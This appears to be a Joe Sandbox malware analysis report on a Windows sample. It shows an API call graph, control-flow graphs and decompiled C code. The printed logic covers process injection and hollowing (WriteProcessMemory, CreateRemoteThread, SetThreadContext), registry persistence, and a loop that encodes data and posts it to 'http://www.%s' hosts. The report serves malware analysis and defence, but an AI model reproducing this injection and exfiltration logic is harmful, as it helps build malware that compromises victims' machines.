4007520 GetAllUsersProfileDirectoryA 5430->5432 5433 4007536 GetEnvironmentVariableA 5430->5433 5435 40075d4 RegOpenKeyExA 5431->5435 5436 40075c6 TerminateThread 5431->5436 5434 400754d lstrcatA lstrcatA lstrcatA 5432->5434 5433->5434 5434->5431 5438 4007649 5435->5438 5439 400762a RegDeleteValueA RegCloseKey 5435->5439 5436->5435 5440 400765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 5438->5440 5441 4005e30 6 API calls 5438->5441 5439->5438 5442 40065ce ExitProcess 5440->5442 5443 40076df lstrlenA WriteFile CloseHandle 5440->5443 5444 400765b 5441->5444 5445 4007731 5443->5445 5444->5440 5446 4007744 CreateProcessA 5445->5446 5447 40077a3 ExitProcess 5446->5447 5448 4007796 CloseHandle 5446->5448 5448->5447 5450 4006638 5449->5450 5451 4007264 5449->5451 5450->5326 5450->5327 5451->5450 5452 40072ad wsprintfA 5451->5452 5453 40072d8 5452->5453 5454 40072df RegOpenKeyExA 5452->5454 5453->5454 5454->5450 5455 4007307 RegQueryValueExA 5454->5455 5456 4007333 5455->5456 5457 40073a5 RegCloseKey 5455->5457 5456->5457 5458 4007339 GetLocalTime 5456->5458 5457->5450 5489 4009910 SystemTimeToFileTime SystemTimeToFileTime 5458->5489 5460 4007388 5460->5457 5461->5348 5491 40020b0 5462->5491 5466 4006891 5465->5466 5467 40073d0 5465->5467 5466->5355 5467->5466 5468 4007419 wsprintfA 5467->5468 5469 4007444 5468->5469 5470 400744b RegOpenKeyExA 5468->5470 5469->5470 5470->5466 5471 400746f GetLocalTime RegSetValueExA RegCloseKey 5470->5471 5471->5466 5472->5370 5474 4002573 5473->5474 5475 4002527 5473->5475 5474->5376 5475->5474 5476 4002531 VirtualAlloc 5475->5476 5476->5474 5477 400257a VirtualAllocEx 5476->5477 5478 40025d7 5477->5478 5479 400259f VirtualAllocEx 5477->5479 5481 4002653 WriteProcessMemory 5478->5481 5479->5478 5480 40025bf VirtualFree 5479->5480 5480->5474 5482 4002672 VirtualFree 5481->5482 5483 4002687 VirtualFree CreateRemoteThread 5481->5483 5482->5474 5483->5474 5485 400a3ed 5484->5485 5486 400a370 5484->5486 5485->5315 5486->5485 5487 400a39b RegOpenKeyExA 5486->5487 5487->5485 5488 400a3bf RegSetValueExA RegCloseKey 5487->5488 5488->5485 5490 400996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 5489->5490 5490->5460 5492 40020c3 GetEnvironmentVariableA lstrcatA 5491->5492 5496 4002080 5491->5496 5493 40020f2 lstrcatA lstrcatA 5492->5493 5494 4002115 5492->5494 5493->5494 5495 4002138 VirtualAlloc 5494->5495 5495->5496 5497 400219d CreateProcessA 5495->5497 5496->5349 5496->5369 5498 40021e2 VirtualAllocEx 5497->5498 5499 40021ca VirtualFree 5497->5499 5500 4002213 VirtualAllocEx 5498->5500 5502 400227d 5498->5502 5499->5496 5501 400223c TerminateProcess CloseHandle CloseHandle VirtualFree 5500->5501 5500->5502 5501->5496 5503 400237b WriteProcessMemory 5502->5503 5504 40023a0 TerminateProcess CloseHandle CloseHandle VirtualFree 5503->5504 5505 40023e1 VirtualFree GetThreadContext 5503->5505 5504->5496 5506 4002444 WriteProcessMemory 5505->5506 5507 4002414 TerminateProcess CloseHandle CloseHandle 5505->5507 5508 4002497 SetThreadContext 5506->5508 5509 400246a TerminateProcess CloseHandle CloseHandle 5506->5509 5507->5496 5510 40024c4 ResumeThread 5508->5510 5511 40024d9 TerminateProcess CloseHandle CloseHandle 5508->5511 5509->5496 5510->5496 5511->5496 5513 40077c0 CoInitialize 5512->5513 5514 40078c3 5512->5514 5515 40077e8 5513->5515 5516 40078bd CoUninitialize 5513->5516 5517 4007898 VirtualFree 5515->5517 5518 40077fc GetExitCodeProcess 5515->5518 5516->5514 5521 40097c0 2 API calls 5517->5521 5519 400788f 5518->5519 5520 4007818 5518->5520 5519->5517 5522 4007821 Sleep 5520->5522 5523 400782e CloseHandle Sleep 5520->5523 5524 40078ba 5521->5524 5522->5519 5525 4002070 32 API calls 5523->5525 5524->5516 5527 4007851 5525->5527 5526 4007863 5526->5517 5527->5519 5527->5526 5528 4002510 8 API calls 5527->5528 5529 400788c 5528->5529 5529->5519 6186 1000157a 6187 10001688 6186->6187 6188 10001693 SetLastError 6187->6188 6189 1000169f 6187->6189 6188->6189 6190 4003fff WSACleanup CoUninitialize 6191 400400a ExitProcess 6190->6191

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 2370000-23703d9 call 23709fc * 2 13 23709ef 0->13 14 23703df-23703e6 0->14 16 23709f1-23709fb 13->16 14->13 15 23703ec-23703f3 14->15 15->13 17 23703f9-2370400 15->17 17->13 18 2370406-237040f 17->18 18->13 19 2370415-237042a 18->19 19->13 20 2370430-2370439 19->20 20->13 21 237043f-2370444 20->21 21->13 22 237044a-2370459 21->22 23 2370483-23704aa GetNativeSystemInfo 22->23 24 237045b 22->24 23->13 26 23704b0-23704c7 VirtualAlloc 23->26 25 237045d-2370463 24->25 29 2370465 25->29 30 2370468-237047a 25->30 27 23704dc-23704e0 26->27 28 23704c9-23704d8 26->28 31 2370504-2370509 27->31 32 23704e2-23704f1 27->32 28->27 29->30 30->25 33 237047c 30->33 36 237050b-2370518 31->36 37 237051a-2370536 31->37 35 23704fd-2370500 32->35 33->23 38 23704f3-23704fc 35->38 39 2370502 35->39 36->36 36->37 40 237056a-237057b 37->40 41 2370538 37->41 38->35 39->37 42 2370581-2370588 40->42 43 237063e-237064f 40->43 44 237053a-237053e 41->44 42->43 45 237058e-2370599 42->45 46 2370655-237066d 43->46 47 237081e-2370828 43->47 48 2370540-2370554 44->48 49 237055a-2370568 44->49 45->43 50 237059f-23705a3 45->50 51 237066f-2370676 46->51 52 237067c-2370689 46->52 53 23708e4-23708f7 47->53 54 237082e-2370841 47->54 48->48 55 2370556 48->55 49->40 49->44 56 23705a4-23705a7 50->56 51->51 57 2370678 51->57 59 2370751-237075d 52->59 60 237068f-2370692 52->60 61 2370997-23709ab 53->61 62 23708fd-2370901 53->62 54->53 58 2370847 54->58 55->49 63 237061b-2370626 56->63 57->52 64 237084b-2370868 58->64 59->47 67 2370763-2370780 59->67 60->59 65 2370698-23706b0 60->65 82 23709d6-23709e2 call 10002720 61->82 83 23709ad-23709bb 61->83 66 2370902-2370905 62->66 68 23705a9-23705bb 63->68 69 2370628-237062d 63->69 90 23708c5-23708d3 64->90 91 237086a 64->91 65->59 70 23706b6-23706c8 65->70 71 2370907-2370917 66->71 72 2370979-237098a 66->72 85 2370782 67->85 86 23707df-23707e5 67->86 75 23705e5-23705e9 68->75 76 23705bd-23705e3 68->76 69->56 74 2370633-2370637 69->74 79 23706cc-237073a 70->79 80 2370934-2370936 71->80 81 2370919-237091b 71->81 72->66 78 2370990 72->78 74->43 88 23705eb-23705f6 75->88 89 23705f8-23705fd 75->89 87 2370619 76->87 78->61 79->79 92 237073c-237074b 79->92 96 2370942-2370944 80->96 97 2370938-2370940 80->97 93 2370927-2370932 81->93 94 237091d-2370925 81->94 102 23709e4-23709ed 82->102 83->82 95 23709bd-23709bf 83->95 101 2370786-2370788 85->101 106 23707e7-23707eb 86->106 107 2370804-2370814 86->107 87->63 88->87 104 2370606-2370609 89->104 105 23705ff-2370604 89->105 90->64 103 23708d9-23708dd 90->103 99 237086e-2370872 91->99 92->59 108 237094a-2370955 93->108 94->108 100 23709c0-23709cd 95->100 98 2370945-2370947 96->98 97->98 98->108 114 2370874-237087b 99->114 115 237087d-237088a 99->115 127 23709cf 100->127 109 2370793-23707a0 101->109 110 237078a-2370791 101->110 102->16 103->53 104->87 117 237060b 104->117 116 237060e-2370616 105->116 106->107 118 23707ed-23707f4 106->118 107->67 111 237081a 107->111 112 2370957-237095c 108->112 113 2370960-2370975 108->113 124 23707a2-23707a7 109->124 125 23707ad-23707c2 109->125 123 23707c3-23707d0 110->123 111->47 112->113 113->72 119 23708ad-23708b9 114->119 120 2370897-23708ac 115->120 121 237088c-2370891 115->121 116->87 117->116 118->107 126 23707f6-23707fc 118->126 133 23708c1 119->133 134 23708bb-23708bf 119->134 120->119 121->121 130 2370893 121->130 135 23707d2-23707d6 123->135 136 23707d8 123->136 124->124 128 23707a9 124->128 125->123 126->107 127->82 128->125 130->120 133->90 134->99 135->101 136->86
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 0237048B
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 023704BB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.571769846.0000000002370000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2370000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                                                                                          • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                                                                                          • API String ID: 2032221330-2899676511
                                                                                                                                                                                                                                                                          • Opcode ID: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                          • Instruction ID: 7ee377fc7e22cbb3de3320b90d361b1bd9ad6af243fc37fbce81f4cdddb09321
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 305289715083858FE734CF24C880BABBBE5BF95714F04492EE9C98B251E774E948CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 138 4004ba0-4004bbc CoInitialize 139 40056f0-40056fc CoUninitialize 138->139 140 4004bc2-4004bff call 4007b70 SetEvent 138->140 140->139 144 4004c05-4004c0e 140->144 145 4004c10-4004c21 WaitForSingleObject 144->145 146 4004c28-4004c84 VirtualAlloc * 3 144->146 145->146 149 4004c23 145->149 147 4004c8a-4004c8e 146->147 148 40056eb 146->148 147->148 150 4004c94-4004c98 147->150 148->139 149->139 150->148 151 4004c9e-4004cbd 150->151 153 40052a2-40052b2 151->153 154 4004cc3-4004cd0 151->154 155 40052b4-40052be 153->155 156 4005325-400534e call 4008370 153->156 157 4004cd6-4004ce3 154->157 158 400529d 154->158 155->156 159 40052c0-40052d1 155->159 171 4005354-400537f lstrlenA * 2 156->171 172 40056b8-40056e5 VirtualFree * 3 156->172 161 4004ce5-4004d17 call 4006170 * 2 call 40060c0 157->161 162 4004d1c-4004d29 157->162 159->156 163 40052d3-40052dd 159->163 161->158 166 4004d62-4004d6f 162->166 167 4004d2b-4004d5d call 4006170 * 2 call 40060c0 162->167 163->156 168 40052df-4005322 call 4007b70 163->168 169 4004d71-4004da3 call 4006170 * 2 call 40060c0 166->169 170 4004da8-4004db5 166->170 167->158 168->156 169->158 180 4004db7-4004dd8 GetCurrentThreadId call 4006170 170->180 181 4004e2c-4004e39 170->181 171->172 178 4005385-40053ca wsprintfA CryptBinaryToStringA 171->178 172->148 178->172 185 40053d0-400544e MultiByteToWideChar call 40017d0 178->185 199 4004dda-4004dfb call 4006170 call 40060c0 180->199 200 4004dfd-4004e04 180->200 187 4004e72-4004e7f 181->187 188 4004e3b-4004e6d call 4006170 * 2 call 40060c0 181->188 217 4005454-400545e 185->217 218 400569b-40056a2 185->218 192 4004ee1-4004eee 187->192 193 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 187->193 188->158 205 4004f40-4004f4d 192->205 206 4004ef0-4004f13 GlobalMemoryStatus call 4006170 192->206 215 4004eb9-4004edc call 4006170 call 40060c0 193->215 214 4004e27 199->214 213 4004e06-4004e24 call 4006170 call 40060c0 200->213 200->214 211 4004f86-4004f93 205->211 212 4004f4f-4004f81 call 4006170 * 2 call 40060c0 205->212 220 4004f18-4004f3b call 4006170 call 40060c0 206->220 227 4004fd0-4004fdd 211->227 228 4004f95-4004fcb call 4006170 * 2 call 40060c0 211->228 212->158 213->214 214->158 215->158 230 4005470-4005477 217->230 231 4005460-400546a 217->231 218->172 229 40056a4-40056b2 VirtualFree 218->229 220->158 237 4005032-400503f 227->237 238 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 227->238 228->158 229->172 232 400551f-4005526 230->232 234 400547d-40054af VirtualFree 230->234 231->230 231->232 232->218 251 400552c-4005540 EnterCriticalSection 232->251 245 40054c0-40054c7 234->245 253 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 237->253 254 4005096-40050a3 237->254 238->158 245->232 257 40054c9-40054f5 call 40017d0 245->257 263 4005542-4005573 VirtualAlloc call 4007b70 251->263 264 400558c-40055c1 VirtualAlloc 251->264 253->158 258 4005104-4005111 254->258 259 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 254->259 283 40054fa-400550d 257->283 277 4005172-400517f 258->277 278 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 258->278 259->158 289 4005578-4005587 263->289 267 40055c7-40055d8 GetTickCount 264->267 268 400568e-4005695 LeaveCriticalSection 264->268 279 40055da-400561a call 4007b70 * 2 267->279 280 400561c-4005659 call 4007b70 * 2 267->280 268->218 284 40051e0-40051ed 277->284 285 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 277->285 278->158 331 400565c-400568b VirtualFree 279->331 280->331 296 400551b 283->296 297 400550f-4005519 283->297 301 400523f-400524c 284->301 302 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 284->302 285->158 289->268 296->232 297->296 308 400551d 297->308 301->158 306 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 301->306 302->158 306->158 308->245 331->268
                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04004BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                          				CHAR* _v64;
                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                                                                                                          				CHAR* _v424;
                                                                                                                                                                                                                                                                          				int _v428;
                                                                                                                                                                                                                                                                          				void* _v432;
                                                                                                                                                                                                                                                                          				long _v436;
                                                                                                                                                                                                                                                                          				short _v948;
                                                                                                                                                                                                                                                                          				void* _v952;
                                                                                                                                                                                                                                                                          				void* _v956;
                                                                                                                                                                                                                                                                          				void* _v960;
                                                                                                                                                                                                                                                                          				void* _v964;
                                                                                                                                                                                                                                                                          				long _v968;
                                                                                                                                                                                                                                                                          				void* _t306;
                                                                                                                                                                                                                                                                          				void* _t307;
                                                                                                                                                                                                                                                                          				void* _t308;
                                                                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                                                                          				int _t318;
                                                                                                                                                                                                                                                                          				long _t328;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				void* _t351;
                                                                                                                                                                                                                                                                          				long _t358;
                                                                                                                                                                                                                                                                          				void* _t637;
                                                                                                                                                                                                                                                                          				void* _t638;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize(); // executed
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                          					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                          					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                          					_v40 = 0xea60;
                                                                                                                                                                                                                                                                          					_v44 = _v28;
                                                                                                                                                                                                                                                                          					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                          						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                          						_v52 = 0x100000;
                                                                                                                                                                                                                                                                          						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v48 = _t306;
                                                                                                                                                                                                                                                                          						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t307;
                                                                                                                                                                                                                                                                          						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v60 = _t308;
                                                                                                                                                                                                                                                                          						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                          							L82:
                                                                                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v68 = _v48;
                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                          							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                          								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                          								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                          								E04007B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							_t312 = E04008370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                          							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                          							_v76 = _t312;
                                                                                                                                                                                                                                                                          							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                          								L81:
                                                                                                                                                                                                                                                                          								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								goto L82;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                          								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                          								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v428 = 0x100000;
                                                                                                                                                                                                                                                                          								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v956 = 0;
                                                                                                                                                                                                                                                                          								_v432 = 0;
                                                                                                                                                                                                                                                                          								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                          								_v952 = 0;
                                                                                                                                                                                                                                                                          								_t328 = E040017D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          								_v436 = _t328;
                                                                                                                                                                                                                                                                          								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                          									L79:
                                                                                                                                                                                                                                                                          									if(_v956 != 0) {
                                                                                                                                                                                                                                                                          										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                          									if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          										goto L70;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									_v956 = 0;
                                                                                                                                                                                                                                                                          									_v432 = 0;
                                                                                                                                                                                                                                                                          									_v960 = 0;
                                                                                                                                                                                                                                                                          									while(_v960 < 4) {
                                                                                                                                                                                                                                                                          										_t358 = E040017D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          										_v436 = _t358;
                                                                                                                                                                                                                                                                          										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                          											goto L70;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L70;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									L70:
                                                                                                                                                                                                                                                                          									if(_v436 > 0) {
                                                                                                                                                                                                                                                                          										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                          											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											_v964 = _t333;
                                                                                                                                                                                                                                                                          											if(_v964 != 0) {
                                                                                                                                                                                                                                                                          												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                          													E04007B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                          													E04007B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													E04007B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													E04007B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                          											E04007B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                          											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L79;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L83;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                          0x04004bac
                                                                                                                                                                                                                                                                          0x04004bb5
                                                                                                                                                                                                                                                                          0x04004bbc
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056fc
                                                                                                                                                                                                                                                                          0x04004bc2
                                                                                                                                                                                                                                                                          0x04004bcc
                                                                                                                                                                                                                                                                          0x04004bd1
                                                                                                                                                                                                                                                                          0x04004bdb
                                                                                                                                                                                                                                                                          0x04004be1
                                                                                                                                                                                                                                                                          0x04004beb
                                                                                                                                                                                                                                                                          0x04004bf9
                                                                                                                                                                                                                                                                          0x04004c31
                                                                                                                                                                                                                                                                          0x04004c34
                                                                                                                                                                                                                                                                          0x04004c49
                                                                                                                                                                                                                                                                          0x04004c4f
                                                                                                                                                                                                                                                                          0x04004c60
                                                                                                                                                                                                                                                                          0x04004c66
                                                                                                                                                                                                                                                                          0x04004c77
                                                                                                                                                                                                                                                                          0x04004c7d
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x040056eb
                                                                                                                                                                                                                                                                          0x04004bf6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004c9e
                                                                                                                                                                                                                                                                          0x04004ca1
                                                                                                                                                                                                                                                                          0x04004ca4
                                                                                                                                                                                                                                                                          0x04004cb6
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x040052a8
                                                                                                                                                                                                                                                                          0x040052b2
                                                                                                                                                                                                                                                                          0x040052eb
                                                                                                                                                                                                                                                                          0x040052f3
                                                                                                                                                                                                                                                                          0x0400530e
                                                                                                                                                                                                                                                                          0x04005313
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x0400532b
                                                                                                                                                                                                                                                                          0x0400533f
                                                                                                                                                                                                                                                                          0x04005344
                                                                                                                                                                                                                                                                          0x04005347
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x040056b8
                                                                                                                                                                                                                                                                          0x040056c3
                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                          0x040056e5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005362
                                                                                                                                                                                                                                                                          0x0400537f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005397
                                                                                                                                                                                                                                                                          0x0400539d
                                                                                                                                                                                                                                                                          0x040053a0
                                                                                                                                                                                                                                                                          0x040053ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040053d0
                                                                                                                                                                                                                                                                          0x040053da
                                                                                                                                                                                                                                                                          0x040053fd
                                                                                                                                                                                                                                                                          0x04005403
                                                                                                                                                                                                                                                                          0x04005439
                                                                                                                                                                                                                                                                          0x0400543e
                                                                                                                                                                                                                                                                          0x04005441
                                                                                                                                                                                                                                                                          0x0400544e
                                                                                                                                                                                                                                                                          0x0400569b
                                                                                                                                                                                                                                                                          0x040056a2
